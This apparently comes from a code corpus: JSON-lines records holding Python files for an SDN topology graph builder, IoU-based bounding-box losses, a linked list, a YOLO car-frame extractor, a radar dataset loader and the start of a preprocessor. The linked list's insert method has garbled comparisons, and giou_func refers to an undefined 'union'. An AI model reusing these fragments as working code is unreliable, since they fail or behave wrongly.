self.nodes.remove(value)\n \n def add_edge(self, from_node, from_port, to_node, to_port, distance):\n self.edges[from_node].append(to_node)\n self.distances[(from_node, to_node)] = distance\n self.ports[(from_node,to_node)] = (from_port,to_port)\n \n def del_edge(self,from_node, from_port, to_node, to_port):\n if from_node in self.edges.keys():\n to_delete_index = self.edges[from_node].index(to_node)\n del self.edges[from_node][to_delete_index]\n \n if len(self.edges[from_node]) == 0:\n self.edges.pop(from_node)\n \n if (from_node, to_node) in self.distances.keys():\n self.distances.pop((from_node, to_node))\n \n if (from_node,to_node) in self.ports.keys():\n self.ports.pop((from_node,to_node))\n \n was_there = False\n for item in self.edges.values():\n if to_node in item:\n was_there = True\n if was_there == False:\n self.del_node(to_node)\n \n def _handle_LinkEvent(self, event):\n\n if (event.added == True ):\n log.info(\"ConnectionUp, dpid1=%s\" % (event.link.dpid1))\n log.info(\"ConnectionUp, dpid2=%s\" % (event.link.dpid2))\n self.add_node(event.link.dpid1)\n self.add_node(event.link.dpid2)\n self.add_edge(event.link.dpid1, event.link.port1, event.link.dpid2, event.link.port2, 1)\n else:\n log.info(\"ConnectionDown, dpid1=%s\" % (event.link.dpid1))\n log.info(\"ConnectionDown, dpid2=%s\" % (event.link.dpid2))\n self.del_edge(event.link.dpid1, event.link.port1, event.link.dpid2, event.link.port2)\n \n ev = GraphStructureChanged(self)\n self.raiseEvent(ev)\n return EventHalt\n \n def get_graph_structures(self):\n return self.nodes,self.edges,self.distances,self.ports\n \n def get_ports(self):\n return self.ports\n \n def minimal_cost_spanning_tree(self,group_members,root):\n visited = set()\n visited_group_members = set()\n min_tree = []\n \n result_min_tree = []\n \n nodes = set(self.nodes)\n group_members = set(group_members.keys())\n visited.add(root)\n \n before_edges = {}\n \n while visited_group_members != group_members or visited == nodes:\n not_visited = set()\n not_visited = nodes.difference(visited)\n \n min_edge = 0\n for visited_node in visited:\n for not_visited_node in not_visited:\n temp_edge = (visited_node,not_visited_node)\n if (temp_edge in self.distances.keys()):\n if min_edge == 0:\n 
min_edge = temp_edge\n elif self.distances[temp_edge] < self.distances[min_edge]:\n min_edge = (visited_node,not_visited_node)\n \n if not before_edges.has_key(min_edge[1]):\n before_edge = min_edge\n before_edges.update({min_edge[1]:before_edge}) \n \n if min_edge not in min_tree:\n min_tree.append(min_edge)\n \n visited.add(min_edge[1])\n if min_edge[1] in group_members:\n visited_group_members.add(min_edge[1])\n log.info(\"The min tree: \"+str(min_tree))\n log.info(\"The before edge dict: \"+str(before_edges))\n \n for member in group_members:\n temp_edge = ()\n for edge in min_tree:\n if edge[1] == member:\n temp_edge = edge\n break\n \n result_min_tree.append(temp_edge)\n while temp_edge[0] != root:\n temp_edge = before_edges[temp_edge[0]]\n if temp_edge not in result_min_tree:\n result_min_tree.append(temp_edge)\n \n return result_min_tree\n\ndef launch():\n graph_builder = GraphBuilder()\n core.register(\"GraphBuilder\",graph_builder)\n ","sub_path":"graph_builder.py","file_name":"graph_builder.py","file_ext":"py","file_size_in_byte":5630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"505543683","text":"import torch\nfrom torch import nn\nimport math\nimport torch.nn.functional as F\nimport torch.cuda.amp as amp\n\nclass IOULoss(nn.Module):\n def __init__(self, loc_loss_type):\n super(IOULoss, self).__init__()\n self.loc_loss_type = loc_loss_type\n\n def forward(self, pred, target, weight=None):\n pred_left = pred[:, 0]\n pred_top = pred[:, 1]\n pred_right = pred[:, 2]\n pred_bottom = pred[:, 3]\n\n target_left = target[:, 0]\n target_top = target[:, 1]\n target_right = target[:, 2]\n target_bottom = target[:, 3]\n\n pred_area = (pred_left + pred_right) * (pred_top + pred_bottom)\n target_area = (target_left + target_right) * (target_top + target_bottom)\n\n w_intersect = torch.min(pred_left, target_left) + torch.min(pred_right, target_right)\n g_w_intersect = torch.max(pred_left, target_left) + torch.max(pred_right, target_right)\n h_intersect = torch.min(pred_bottom, target_bottom) + torch.min(pred_top, target_top)\n g_h_intersect = torch.max(pred_bottom, target_bottom) + torch.max(pred_top, target_top)\n ac_uion = g_w_intersect * g_h_intersect + 1e-7\n area_intersect = w_intersect * h_intersect\n area_union = target_area + pred_area - area_intersect\n ious = (area_intersect + 1.0) / (area_union + 1.0)\n gious = ious - (ac_uion - area_union) / ac_uion\n\n if self.loc_loss_type == 'iou':\n losses = -torch.log(ious)\n elif self.loc_loss_type == 'linear_iou':\n losses = 1 - ious\n elif self.loc_loss_type == 'giou':\n losses = 1 - gious\n else:\n raise NotImplementedError\n\n if weight is not None and weight.sum() > 0:\n return (losses * weight).sum() / weight.sum()\n else:\n assert losses.numel() != 0\n return losses.mean()\n # if losses.numel() == 0:\n # print('aa')\n\nlinear_iou = IOULoss(loc_loss_type='linear_iou')\nlinear_giou = IOULoss(loc_loss_type='giou')\n\n## GIOU loss is proposed here: https://arxiv.org/abs/1902.09630\nclass GIOULoss(nn.Module):\n\n def __init__(self, eps=1e-5, reduction='mean'):\n super(GIOULoss, self).__init__()\n self.eps = eps\n self.reduction = reduction\n\n def forward(self, pr_bboxes, gt_bboxes):\n \"\"\"\n pr_bboxes: tensor (-1, 4) xyxy, predicted bbox\n gt_bboxes: tensor (-1, 4) xyxy, ground truth bbox\n loss proposed in the paper of giou\n \"\"\"\n giou = giou_func(gt_bboxes, pr_bboxes, self.eps)\n loss = 1. 
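`minimal_cost_spanning_tree` above is Prim's algorithm grown from `root` until every multicast member is covered, with a back-pointer pass to prune branches that reach no member. Two portability hazards: the Python 2 `dict.has_key` call (spelled `key in dict` in Python 3) and the `min_edge = 0` sentinel, which crashes on a disconnected graph. The core growth loop over the same `distances[(u, v)]` layout:

```python
def prim_until(distances, root, targets):
    """Grow a tree from `root` until all `targets` are visited."""
    visited, tree = {root}, []
    while not targets <= visited:
        candidates = [(d, (u, v)) for (u, v), d in distances.items()
                      if u in visited and v not in visited]
        if not candidates:
            raise ValueError('some targets are unreachable from the root')
        _, edge = min(candidates)   # cheapest edge leaving the visited set
        tree.append(edge)
        visited.add(edge[1])
    return tree

edges = {(1, 2): 1, (2, 3): 2, (1, 3): 5}
print(prim_until(edges, root=1, targets={3}))  # [(1, 2), (2, 3)]
```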
- giou\n if self.reduction == 'mean':\n loss = loss.mean()\n elif self.reduction == 'sum':\n loss = loss.sum()\n elif self.reduction == 'none':\n pass\n return loss\n\n\n## DIOU loss is proposed here: https://arxiv.org/abs/1911.08287\nclass DIOULoss(nn.Module):\n\n def __init__(self, eps=1e-5, reduction='mean'):\n super(DIOULoss, self).__init__()\n self.eps = eps\n self.reduction = reduction\n\n def forward(self, pr_bboxes, gt_bboxes, weight=None):\n \"\"\"\n pr_bboxes: tensor (-1, 4) xyxy, predicted bbox\n gt_bboxes: tensor (-1, 4) xyxy, ground truth bbox\n loss proposed in the paper of giou\n \"\"\"\n diou = diou_func(gt_bboxes, pr_bboxes, self.eps)\n loss = 1. - diou\n if self.reduction == 'mean':\n loss = loss.mean()\n elif self.reduction == 'sum':\n loss = loss.sum()\n elif self.reduction == 'none':\n pass\n\n if weight is not None and weight.sum() > 0:\n return (loss * weight).sum() / weight.sum()\n else:\n assert loss.numel() != 0\n return loss.mean()\n\n\n\n\n## CIOU loss is also proposed here: https://arxiv.org/abs/1911.08287\nclass CIOULoss(nn.Module):\n\n def __init__(self, eps=1e-5, reduction='sum'):\n super(CIOULoss, self).__init__()\n self.eps = eps\n self.reduction = reduction\n\n def forward(self, pr_bboxes, gt_bboxes):\n \"\"\"\n pr_bboxes: tensor (-1, 4) xyxy, predicted bbox\n gt_bboxes: tensor (-1, 4) xyxy, ground truth bbox\n loss proposed in the paper of giou\n \"\"\"\n ciou = ciou_func(gt_bboxes, pr_bboxes, self.eps)\n loss = 1. - ciou\n if self.reduction == 'mean':\n loss = loss.mean()\n elif self.reduction == 'sum':\n loss = loss.sum()\n elif self.reduction == 'none':\n pass\n return loss\n\n\ndef iou_func(gt_bboxes, pr_bboxes, eps=1e-5):\n \"\"\"\n input:\n gt_bboxes: tensor (N, 4) xyxy\n pr_bboxes: tensor (N, 4) xyxy\n output:\n gious: tensor (N, )\n \"\"\"\n gt_area = (gt_bboxes[:, 2]-gt_bboxes[:, 0])*(gt_bboxes[:, 3]-gt_bboxes[:, 1])\n pr_area = (pr_bboxes[:, 2]-pr_bboxes[:, 0])*(pr_bboxes[:, 3]-pr_bboxes[:, 1])\n\n # iou\n lt = torch.max(gt_bboxes[:, :2], pr_bboxes[:, :2])\n rb = torch.min(gt_bboxes[:, 2:], pr_bboxes[:, 2:])\n wh = (rb - lt + eps).clamp(min=0)\n inter = wh[:, 0] * wh[:, 1]\n union = gt_area + pr_area - inter\n iou = inter / union\n return iou\n\n\ndef giou_func(gt_bboxes, pr_bboxes, eps=1e-5):\n \"\"\"\n input:\n gt_bboxes: tensor (N, 4) xyxy\n pr_bboxes: tensor (N, 4) xyxy\n output:\n gious: tensor (N, )\n \"\"\"\n iou = iou_func(gt_bboxes, pr_bboxes, eps)\n\n # enclosure\n lt = torch.min(gt_bboxes[:, :2], pr_bboxes[:, :2])\n rb = torch.max(gt_bboxes[:, 2:], pr_bboxes[:, 2:])\n wh = (rb - lt + eps).clamp(min=0)\n enclosure = wh[:, 0] * wh[:, 1]\n\n giou = iou - (enclosure - union) / enclosure\n return giou\n\n\n\ndef diou_func(gt_bboxes, pr_bboxes, eps=1e-5):\n \"\"\"\n input:\n gt_bboxes: tensor (N, 4) xyxy\n pr_bboxes: tensor (N, 4) xyxy\n output:\n dious: tensor (N, )\n \"\"\"\n iou = iou_func(gt_bboxes, pr_bboxes, eps)\n\n # center distance\n # gt_cent_x = gt_bboxes[:, 0::2].mean(dim=-1, keepdims=True)\n # gt_cent_y = gt_bboxes[:, 1::2].mean(dim=-1, keepdims=True)\n # pr_cent_x = pr_bboxes[:, 0::2].mean(dim=-1, keepdims=True)\n # pr_cent_y = pr_bboxes[:, 1::2].mean(dim=-1, keepdims=True)\n # gt_cent = torch.cat([gt_cent_x, gt_cent_y], dim=-1)\n # pr_cent = torch.cat([pr_cent_x, pr_cent_y], dim=-1)\n # cent_dis = F.pairwise_distance(gt_cent, pr_cent)\n gt_cent_x = gt_bboxes[:, 0::2].mean(dim=-1)\n gt_cent_y = gt_bboxes[:, 1::2].mean(dim=-1)\n pr_cent_x = pr_bboxes[:, 0::2].mean(dim=-1)\n pr_cent_y = pr_bboxes[:, 1::2].mean(dim=-1)\n 
cent_dis = (gt_cent_x - pr_cent_x).pow(2.) + (gt_cent_y - pr_cent_y).pow(2.)\n\n # diag distance\n lt = torch.min(gt_bboxes[:, :2], pr_bboxes[:, :2])\n rb = torch.max(gt_bboxes[:, 2:], pr_bboxes[:, 2:])\n # diag_dis = F.pairwise_distance(lt, rb)\n diag_dis = (lt - rb).pow(2).sum(dim=-1)\n\n # diou\n # reg = (cent_dis / (diag_dis + eps)).pow(2.)\n reg = cent_dis / (diag_dis + eps)\n diou = iou - reg\n return diou\n\nlinear_diou = DIOULoss(eps=1e-5, reduction='mean')\n\ndef ciou_func(gt_bboxes, pr_bboxes, eps=1e-5):\n \"\"\"\n input:\n gt_bboxes: tensor (N, 4) xyxy\n pr_bboxes: tensor (N, 4) xyxy\n output:\n cious: tensor (N, )\n \"\"\"\n diou = diou_func(gt_bboxes, pr_bboxes, eps)\n # ciou reg\n creg = CIOURegFunc.apply(gt_bboxes, pr_bboxes, eps)\n\n ciou = diou - creg\n return ciou\n\n\n\nclass CIOURegFunc(torch.autograd.Function):\n '''\n forward and backward of CIOU regularization term\n '''\n @staticmethod\n @amp.custom_fwd\n def forward(ctx, gt_bboxes, pr_bboxes, eps=1e-5):\n gt_w = gt_bboxes[:, 2] - gt_bboxes[:, 0]\n gt_h = gt_bboxes[:, 3] - gt_bboxes[:, 1]\n pr_w = pr_bboxes[:, 2] - pr_bboxes[:, 0]\n pr_h = pr_bboxes[:, 3] - pr_bboxes[:, 1]\n coef = 4. / (math.pi ** 2)\n atan_diff = torch.atan(gt_w / gt_h) - torch.atan(pr_w / pr_h)\n v = atan_diff.pow(2.)\n v = coef * v\n iou = iou_func(gt_bboxes, pr_bboxes, eps)\n alpha = v / (1 - iou + v)\n reg = alpha * v\n\n ## we compute gradient directly, since bbox does not use too much memory\n # grad of pred bbox\n # h2_w2 = 1. / (pr_h.pow(2.) + pr_w.pow(2.)) # org grad\n h2_w2 = 1. # replace with 1 as proposed in paper\n dv = 2 * coef * atan_diff * h2_w2 * alpha\n # this is negative of paper formula, but I think this is the right way\n dv_dh = dv * pr_w\n dv_dw = -dv * pr_h\n dx1, dx2 = -dv_dw.view(-1, 1), dv_dw.view(-1, 1)\n dy1, dy2 = -dv_dh.view(-1, 1), dv_dh.view(-1, 1)\n d_pr_bbox = torch.cat([dx1, dy1, dx2, dy2], dim=-1)\n\n # grad of gt bbox\n # h2_w2 = 1. / (gt_h.pow(2.) + gt_w.pow(2.)) # org grad\n h2_w2 = 1. 
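One bug worth flagging in this loss family: `giou_func` above references `union`, but that name is local to `iou_func`, so calling `giou_func` raises a `NameError`; the union (or the IoU pieces) must be recomputed or returned. A self-contained GIoU sketch for xyxy boxes with the union term kept in scope:

```python
import torch

def giou(gt, pr, eps=1e-5):
    """GIoU for (N, 4) xyxy boxes."""
    area_g = (gt[:, 2] - gt[:, 0]) * (gt[:, 3] - gt[:, 1])
    area_p = (pr[:, 2] - pr[:, 0]) * (pr[:, 3] - pr[:, 1])
    lt = torch.max(gt[:, :2], pr[:, :2])
    rb = torch.min(gt[:, 2:], pr[:, 2:])
    wh = (rb - lt).clamp(min=0)
    inter = wh[:, 0] * wh[:, 1]
    union = area_g + area_p - inter
    iou = inter / (union + eps)
    lt_c = torch.min(gt[:, :2], pr[:, :2])   # smallest enclosing box
    rb_c = torch.max(gt[:, 2:], pr[:, 2:])
    wh_c = (rb_c - lt_c).clamp(min=0)
    enclosure = wh_c[:, 0] * wh_c[:, 1]
    return iou - (enclosure - union) / (enclosure + eps)
```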
# replace with 1 as proposed in paper\n dv = 2 * coef * atan_diff * h2_w2 * alpha\n dv_dh = dv * gt_w\n dv_dw = -dv * gt_h\n dx1, dx2 = -dv_dw.view(-1, 1), dv_dw.view(-1, 1)\n dy1, dy2 = -dv_dh.view(-1, 1), dv_dh.view(-1, 1)\n d_gt_bbox = -torch.cat([dx1, dy1, dx2, dy2], dim=-1)\n\n ctx.variables = d_gt_bbox, d_pr_bbox\n return reg\n\n @staticmethod\n @amp.custom_bwd\n def backward(ctx, grad_output):\n d_gt_bbox, d_pr_bbox = ctx.variables\n\n return d_gt_bbox, d_pr_bbox, None\n\n","sub_path":"pysot/models/iou_loss.py","file_name":"iou_loss.py","file_ext":"py","file_size_in_byte":9297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"363711131","text":"class Node:\n next=None\n data=None\n def __init__(self, data, next=None):\n self.data=data\n self.next=next\n\nclass LList:\n head=None\n def __init__(self, head):\n self.head=head\n def print(self):\n if(self.head==None):\n print(\"List is empty\")\n return\n current=self.head\n while(current.next!=None):\n print(\"%d\"%(current.data))\n current=current.next\n print(\"%d\"%(current.data))\n\n def delete(self, node):\n if(self.head==None):\n print(\"List is empty\")\n return\n\n current=self.head\n if(current.data==node.data):\n self.head = current.next\n current.next = None\n print(\"%s deleted\"%(current.data))\n return\n while(current.next!=None):\n if(current.next.data==(node.data)):\n temp=current.next\n current.next = (current.next).next\n temp.next = None\n print(\"%s deleted\"%(temp.data))\n return\n current = current.next\n if(current.next==None):\n self.head=None\n print(\"%s deleted\"%(current.data))\n return\n\n def insert(self, node):\n current=self.head\n if(current==None):\n self.head = node\n print(\"%s inserted\"%(node.data))\n return\n while(1):\n if(current.next==None):\n node.next=None\n current.next=node\n print(\"%s inserted\"%(node.data))\n return\n if(current.data==node.data):\n node.next = current.next\n current.next = node\n print(\"%s inserted\"%(node.data))\n return\n elif(current.datanode.data):\n node.next=current.next\n current.next=node\n print(\"%s inserted\"%(node.data))\n return\n current = current.next\n\n\n\nn1 = Node(100)\nn2 = Node(200)\nn3 = Node(300)\nn4 = Node(400)\nn5 = Node(500)\n\n\nlistHead=LList(n1)\nlistHead.print()\nlistHead.insert(n2)\nlistHead.insert(n4)\nlistHead.insert(n5)\nlistHead.print()\nlistHead.delete(n1)\n\nlistHead.print()\nlistHead.insert(n3)\nlistHead.print()\nlistHead.delete(n5)\nlistHead.print()\nlistHead.insert(n5)\nlistHead.print()\n\n\n'''\nlistHead = LList(n1)\nlistHead.print()\nlistHead.delete(n1)\nlistHead.print()\nlistHead.insert(n1)\nlistHead.print()\n'''","sub_path":"linked_list/single_linked_list.py","file_name":"single_linked_list.py","file_ext":"py","file_size_in_byte":2529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"377360814","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 29 13:11:29 2021\n\nGet images with cars for labeling license plates.\n\n@author: michellegreene\n\"\"\"\n\nimport cv2\nimport glob\nimport numpy as np\n\n# path to video images\ninputPath = '/Volumes/etna/Scholarship/Michelle Greene/Students/Shared/Lewiston/'\n\n# path to output images\noutputPath = '/Volumes/etna/Scholarship/Michelle Greene/Students/Shared/carImages/'\n\n# make list of videos\nvidList = sorted(glob.glob(inputPath+'*.mp4'))\n\n# define YOLO parameters\nCONF_THRESH, NMS_THRESH = 0.5, 0.5\nconfig = 
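In the linked-list record above, `LList.insert` has lost its comparison operators to extraction damage: `elif(current.datanode.data)` was presumably `current.data < node.data` with a nested check against `current.next.data`. A minimal sorted-insert sketch with the comparisons written out:

```python
class Node:
    def __init__(self, data, next=None):
        self.data, self.next = data, next

def sorted_insert(head, node):
    """Insert into an ascending list; returns the (possibly new) head."""
    if head is None or node.data < head.data:
        node.next = head
        return node
    current = head
    while current.next is not None and current.next.data < node.data:
        current = current.next
    node.next, current.next = current.next, node
    return head

head = None
for v in (300, 100, 200):
    head = sorted_insert(head, Node(v))
vals, n = [], head
while n:
    vals.append(n.data)
    n = n.next
print(vals)  # [100, 200, 300]
```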
\"yolo_files/yolov3-tiny.cfg\"\nweights = \"yolo_files/yolov3-tiny.weights\"\n\n# Load the network\nnet = cv2.dnn.readNetFromDarknet(config, weights)\nnet.setPreferableBackend(cv2.dnn.DNN_BACKEND_OPENCV)\nnet.setPreferableTarget(cv2.dnn.DNN_TARGET_CPU)\n\n# Get the output layer from YOLO\nlayers = net.getLayerNames()\noutput_layers = [layers[i[0] - 1] for i in net.getUnconnectedOutLayers()]\n\n# loop through videos\ncar = 0\nfor i in range(len(vidList)):\n # open video\n vid = cv2.VideoCapture(vidList[i])\n \n # loop through frames\n while vid.isOpened():\n \n # read a frame\n success, image = vid.read()\n # assumes that any failure is the end of the video\n if not success:\n break\n height, width = image.shape[:2]\n \n # use YOLOv3 to detect a car, bus, or truck\n # convert the image to blob and perform forward pass to get the \n #bounding boxes with their confidence scores\n blob = cv2.dnn.blobFromImage(image, 0.00392, (416, 416), swapRB=True, crop=False)\n net.setInput(blob)\n layer_outputs = net.forward(output_layers)\n \n class_ids, confidences, b_boxes = [], [], []\n for output in layer_outputs:\n for detection in output:\n scores = detection[5:]\n class_id = np.argmax(scores)\n confidence = scores[class_id]\n\n if confidence > CONF_THRESH:\n if class_id in [2, 5, 7]:\n car += 1\n # write the image to file\n outname = 'car'+str(car)+'.jpg'\n cv2.imwrite(outputPath+outname, image)\n \n \n","sub_path":"saveVideoCars.py","file_name":"saveVideoCars.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"553730193","text":"import os\nimport time\nimport random\nimport pickle\nimport numpy as np\nfrom tqdm import tqdm\n\nfrom torch.utils import data\n\nfrom .loaders import list_pkl_filenames, list_pkl_filenames_from_prepared\n\n\nclass CRDataset(data.Dataset):\n \"\"\"\n Pytorch Dataloader for CR Dataset\n :param detail_dir: data details directory\n :param confmap_dir: confidence maps directory\n :param win_size: seqence window size\n :param n_class: number of classes for detection\n :param step: frame step inside each sequence\n :param stride: data sampling\n :param set_type: train, valid, test\n :param is_random_chirp: random load chirp or not\n \"\"\"\n\n def __init__(self, data_dir, dataset, config_dict, split, is_random_chirp=False, subset=None, noise_channel=False):\n # parameters settings\n self.data_dir = data_dir\n self.dataset = dataset\n self.config_dict = config_dict\n self.n_class = dataset.object_cfg.n_class\n self.win_size = config_dict['train_cfg']['win_size']\n self.split = split\n if split == 'train' or split == 'valid':\n self.step = config_dict['train_cfg']['train_step']\n self.stride = config_dict['train_cfg']['train_stride']\n else:\n self.step = config_dict['test_cfg']['test_step']\n self.stride = config_dict['test_cfg']['test_stride']\n self.is_random_chirp = is_random_chirp\n self.n_chirps = 4\n self.noise_channel = noise_channel\n\n # Dataloader for MNet\n # if 'mnet_cfg' in self.config_dict['model_cfg']:\n # in_chirps, out_channels = self.config_dict['model_cfg']['mnet_cfg']\n # self.n_chirps = in_chirps\n # n_radar_chirps = self.config_dict['dataset_cfg']['radar_cfg']['n_chirps']\n # self.chirp_ids = []\n # for c in range(in_chirps):\n # self.chirp_ids.append(int(n_radar_chirps / in_chirps * c))\n\n # dataset initialization\n self.image_paths = []\n self.radar_paths = []\n self.obj_infos = []\n self.confmaps = []\n self.n_data = 0\n self.index_mapping = []\n\n if subset 
is not None:\n self.data_files = [subset + '.pkl']\n else:\n # self.data_files = list_pkl_filenames(config_dict['dataset_cfg'], split)\n self.data_files = list_pkl_filenames_from_prepared(data_dir, split)\n self.seq_names = [name.split('.')[0] for name in self.data_files]\n self.n_seq = len(self.seq_names)\n\n split_folder = split\n for seq_id, data_file in enumerate(tqdm(self.data_files)):\n data_file_path = os.path.join(data_dir, split_folder, data_file)\n data_details = pickle.load(open(data_file_path, 'rb'))\n if split == 'train' or split == 'valid':\n assert data_details['anno'] is not None\n n_frame = data_details['n_frame']\n self.image_paths.append(data_details['image_paths'])\n self.radar_paths.append(data_details['radar_paths'])\n n_data_in_seq = (n_frame - (self.win_size * self.step - 1)) // self.stride + (\n 1 if (n_frame - (self.win_size * self.step - 1)) % self.stride > 0 else 0)\n self.n_data += n_data_in_seq\n for data_id in range(n_data_in_seq):\n self.index_mapping.append([seq_id, data_id * self.stride])\n if data_details['anno'] is not None:\n self.obj_infos.append(data_details['anno']['metadata'])\n self.confmaps.append(data_details['anno']['confmaps'])\n\n def __len__(self):\n \"\"\"Total number of data/label pairs\"\"\"\n return self.n_data\n\n def __getitem__(self, index):\n\n seq_id, data_id = self.index_mapping[index]\n seq_name = self.seq_names[seq_id]\n image_paths = self.image_paths[seq_id]\n radar_paths = self.radar_paths[seq_id]\n if len(self.confmaps) != 0:\n this_seq_obj_info = self.obj_infos[seq_id]\n this_seq_confmap = self.confmaps[seq_id]\n\n data_dict = dict(\n status=True,\n seq_names=seq_name,\n image_paths=[]\n )\n\n if self.is_random_chirp:\n chirp_id = random.randint(0, self.dataset.sensor_cfg.radar_cfg['n_chirps'] - 1)\n else:\n chirp_id = 0\n\n # Dataloader for MNet\n if 'mnet_cfg' in self.config_dict['model_cfg']:\n chirp_id = [0,1,2,3]\n\n radar_configs = self.dataset.sensor_cfg.radar_cfg\n ramap_rsize = radar_configs['ramap_rsize']\n ramap_asize = radar_configs['ramap_asize']\n\n # Load radar data\n try:\n if radar_configs['data_type'] == 'RI' or radar_configs['data_type'] == 'AP': # drop this format\n radar_npy_win = np.zeros((self.win_size, ramap_rsize, ramap_asize, 2), dtype=np.float32)\n for idx, frameid in enumerate(\n range(data_id, data_id + self.win_size * self.step, self.step)):\n radar_npy_win[idx, :, :, :] = np.load(radar_paths[frameid])\n data_dict['image_paths'].append(image_paths[frameid])\n elif radar_configs['data_type'] == 'RISEP' or radar_configs['data_type'] == 'APSEP':\n if isinstance(chirp_id, int):\n radar_npy_win = np.zeros((self.win_size, ramap_rsize, ramap_asize, 2), dtype=np.float32)\n for idx, frameid in enumerate(\n range(data_id, data_id + self.win_size * self.step, self.step)):\n radar_npy_win[idx, :, :, :] = np.load(radar_paths[frameid][chirp_id])\n data_dict['image_paths'].append(image_paths[frameid])\n elif isinstance(chirp_id, list):\n radar_npy_win = np.zeros((self.win_size, self.n_chirps, ramap_rsize, ramap_asize, 2),\n dtype=np.float32)\n for idx, frameid in enumerate(\n range(data_id, data_id + self.win_size * self.step, self.step)):\n for cid, c in enumerate(chirp_id):\n npy_path = radar_paths[frameid][c]\n radar_npy_win[idx, cid, :, :, :] = np.load(npy_path)\n data_dict['image_paths'].append(image_paths[frameid])\n else:\n raise TypeError\n elif radar_configs['data_type'] == 'ROD2021':\n radar_npy_win = np.zeros((self.win_size, self.n_chirps,ramap_rsize, ramap_asize, 2), dtype=np.float32) # only use 
chirp 0 for training\n for idx, frameid in enumerate(\n range(data_id, data_id + self.win_size * self.step, self.step)):\n for cid, c in enumerate(chirp_id):\n npy_path = radar_paths[frameid][c]\n radar_npy_win[idx, cid, :, :, :] = np.load(npy_path)\n data_dict['image_paths'].append(image_paths[frameid])\n else:\n raise NotImplementedError\n except:\n # in case load npy fail\n data_dict['status'] = False\n if not os.path.exists('./tmp'):\n os.makedirs('./tmp')\n log_name = 'loadnpyfail-' + time.strftime(\"%Y%m%d-%H%M%S\") + '.txt'\n with open(os.path.join('./tmp', log_name), 'w') as f_log:\n f_log.write('npy path: ' + radar_paths[frameid][chirp_id] + \\\n '\\nframe indices: %d:%d:%d' % (data_id, data_id + self.win_size * self.step, self.step))\n # radar_npy_win = np.transpose(radar_npy_win, (3, 0, 1, 2))\n #\n # data_dict['radar_data'] = radar_npy_win\n #\n # if len(self.confmaps) != 0:\n # confmap_gt = this_seq_confmap[data_id:data_id + self.win_size * self.step:self.step]\n # confmap_gt = np.transpose(confmap_gt, (1, 0, 2, 3))\n # obj_info = this_seq_obj_info[data_id:data_id + self.win_size * self.step:self.step]\n #\n # data_dict['anno'] = dict(\n # obj_infos=obj_info,\n # confmaps=confmap_gt,\n # )\n # else:\n # data_dict['anno'] = None\n return data_dict\n\n # Dataloader for MNet\n if 'mnet_cfg' in self.config_dict['model_cfg']:\n radar_npy_win = np.transpose(radar_npy_win, (4, 1, 0, 2, 3))\n radar_npy_win=np.reshape(radar_npy_win, (8, self.win_size, radar_configs['ramap_rsize'], radar_configs['ramap_asize']))\n assert radar_npy_win.shape == (8, self.win_size, radar_configs['ramap_rsize'], radar_configs['ramap_asize'])\n else:\n radar_npy_win = np.transpose(radar_npy_win, (3, 0, 1, 2))\n assert radar_npy_win.shape == (2, self.win_size, radar_configs['ramap_rsize'], radar_configs['ramap_asize'])\n\n data_dict['radar_data'] = radar_npy_win\n\n # Load annotations\n if len(self.confmaps) != 0:\n confmap_gt = this_seq_confmap[data_id:data_id + self.win_size * self.step:self.step]\n confmap_gt = np.transpose(confmap_gt, (1, 0, 2, 3))\n obj_info = this_seq_obj_info[data_id:data_id + self.win_size * self.step:self.step]\n if self.noise_channel:\n assert confmap_gt.shape == \\\n (self.n_class + 1, self.win_size, radar_configs['ramap_rsize'], radar_configs['ramap_asize'])\n else:\n confmap_gt = confmap_gt[:self.n_class]\n assert confmap_gt.shape == \\\n (self.n_class, self.win_size, radar_configs['ramap_rsize'], radar_configs['ramap_asize'])\n\n data_dict['anno'] = dict(\n obj_infos=obj_info,\n confmaps=confmap_gt,\n )\n else:\n data_dict['anno'] = None\n\n return data_dict\n","sub_path":"rodnet/datasets/CRDataset.py","file_name":"CRDataset.py","file_ext":"py","file_size_in_byte":9949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"532593337","text":"# Global modules\nimport collections\nimport math\nimport time\n\n# Internal modules\nfrom src.utils import *\n\nclass PreProcessor:\n \"\"\"\n The preprocessor class that handles binarization and discretization of dataset\n \"\"\"\n def __init__(self):\n self.transactions = []\n self.unique = collections.OrderedDict()\n self.trans_count = 0\n self.mapper = PreProcessor.Mapper()\n\n def get_transactions(self):\n \"\"\"\n Getter method for transactions list of OrderedDict\n\n :return: Transactions list (list(OrderedDict))\n \"\"\"\n return self.transactions\n\n def get_uniques(self):\n \"\"\"\n Getter method for unique itemsets (dictionary)\n\n :return: Unique itemsets (dict), key: items, 
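`CRDataset` above maps a flat index to a `(sequence, start frame)` pair, where `n_data_in_seq` counts the stride-spaced windows of `win_size * step` frames that fit in a sequence, plus one trailing partial-stride window. The index arithmetic on its own:

```python
def window_starts(n_frame, win_size, step, stride):
    """Start frames of every window that fits, mirroring n_data_in_seq."""
    span = win_size * step - 1              # frames a window reaches past its start
    n = (n_frame - span) // stride
    if (n_frame - span) % stride > 0:
        n += 1                              # the trailing partial-stride window
    return [i * stride for i in range(n)]

print(window_starts(n_frame=100, win_size=16, step=1, stride=8))
# [0, 8, 16, 24, 32, 40, 48, 56, 64, 72, 80]
```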
value: counts\n \"\"\"\n return self.unique\n\n def get_transaction_count(self):\n \"\"\"\n Getter method for transaction count after parsing the file\n\n :return: Transaction count (int)\n \"\"\"\n return self.trans_count\n\n def parse_file(self, file):\n \"\"\" The main function to parse the file and run the preprocesser methods\n\n :param file: Filepath of the data\n :return: Returns number of the transaction parsed (int)\n \"\"\"\n print(\"Preprocess begin to parse the file\")\n start_t = time.clock()\n mp = self.mapper\n with open(file, \"r\") as f:\n for line in f:\n chars = str(line)\n # Get all the necessary fields here\n sex = self.get_field(chars, mp.sex)\n race = self.get_field(chars, mp.race)\n score = self.get_field(chars, mp.score)\n lang_native=self.get_field(chars,mp.lang_native)\n fam_comp=self.get_field(chars,mp.fam_comp)\n par_edu=self.get_field(chars,mp.par_edu)\n income=self.get_field(chars,mp.income)\n s_expect=self.get_field(chars,mp.s_expect)\n 